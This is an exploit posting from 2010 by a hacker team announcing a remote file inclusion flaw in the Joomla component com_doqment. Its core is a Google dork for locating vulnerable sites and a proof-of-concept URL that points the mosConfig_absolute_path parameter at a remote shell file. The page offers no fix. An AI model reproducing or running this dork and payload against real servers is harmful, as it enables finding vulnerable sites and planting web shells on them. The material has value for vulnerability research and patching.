[D] Joomla Component com_doqment Remote File Inclusion Vulnerability [z]
2010-12-24 16:37:27Posted by: kedans
# Name : [D] Joomla Component com_doqment Remote File Inclusion Vulnerability [z]
# Date : 21/11/2010
# Author : KedAns-Dz < ked-h (at) hotmail (dot) com >
# Team : [D] HaCkerS-StreeT-Team [z]
# special thanks to : BadR0 (+) Nor0 FouinY
# greetz to : XoreR (+) Fox-Dz (+) Dr.Ride (+) Islampard (+) Hani Nin0 (+)
// Zaki.ENG (+) Masinhou-Dz (+) MaTmour13
Allahou AkbaR -- 1 2 3 ViVa l'Algerie
:::::::::::::::::::::::::::::::::::::::(0x1a)::::::::::::::::::::::::::::::::::::::::
G0ogle Dork : inurl:com_doqment
:::::::::::::::::::::::::::::::::::::::(0x2a)::::::::::::::::::::::::::::::::::::::::
Exploit & p0c :
--> http://[SERVER]/index.php?option=com_doqment&cid=admin.ponygallery.html.php?mosConfig_absolute_path=[ Sh3ll.TxT ]
::::::::::::::::::::::::::::::::::::::(0x3a):::::::::::::::::::::::::::::::::::::::::::
[D] HaCkerS-StreeT-Team [Z]
>> KedAns-Dz (+) BadR0 (+) Dr.Ride (+) XoreR (+) Fox-Dz <<
> Red1One (+) Islampard (+) NoR0 FouinY (+) Hani Nin0 (+) Masinhou-Dz <
:::::::::::::::::::::::::::::: By KedAns DZ :::::::::::::::::::::::::::::::::::::::::::
Fixes
No fixesIn order to submit a new fix you need to be registered.